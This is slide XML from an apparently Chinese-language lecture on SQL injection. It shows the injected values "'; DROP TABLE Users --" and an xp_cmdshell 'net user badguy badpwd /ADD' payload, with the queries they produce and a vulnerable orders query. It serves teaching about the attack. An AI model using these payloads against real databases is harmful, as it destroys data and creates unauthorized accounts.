              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>且登录能够成功</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>该方法可以轻易登录许多站点！</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Arial"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bwMode="auto">
          <a:xfrm>
            <a:off x="3810000" y="3996906"/>
            <a:ext cx="4114800" cy="422694"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="95000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="lg"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ahoma" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1305602" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>恶意的输入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1305603" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="1524000"/>
            <a:ext cx="8610600" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>假设</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> user = </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>′</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  ;  DROP TABLE  Users  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="009900"/>
              </a:solidFill>
              <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>然后脚本执行为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="2400"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ok = execute( SELECT … </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>		WHERE user= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>′ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>′</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> ; DROP TABLE Users  …</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>  )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="009900"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>删除</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>表</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>相似的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>:   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>攻击者可以添加新的用户或者修改密码等等</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="009900"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Arial"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bwMode="auto">
          <a:xfrm>
            <a:off x="5666118" y="4159770"/>
            <a:ext cx="2258682" cy="422694"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="95000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="lg"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ahoma" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1305602" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>恶意的输入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1305603" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="1447800"/>
            <a:ext cx="8001000" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>假设</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>user = </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>′ ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>exec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>			′</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>net user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>badguy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>badpwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>′ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>/ ADD --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="009900"/>
              </a:solidFill>
              <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>然后脚本执行为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ok = execute( SELECT … </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>			WHERE username= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>′ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>′</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> ; exec …</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>  )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="381600" lvl="1" indent="0">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>如果</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>服务器以超级管理员</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>sa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>运行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>攻击者就可以创建数据库服务器中的账户</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Tahoma"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a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>获取隐私信息</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27652" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="596462" y="2759839"/>
            <a:ext cx="6032421" cy="1323439"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>SELECT pizza, toppings, quantity, date</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  FROM orders</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>userid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>userid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>′</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AND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>order_month</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>month</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36868" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="420679" y="2247633"/>
            <a:ext cx="2667000" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:effectLst>
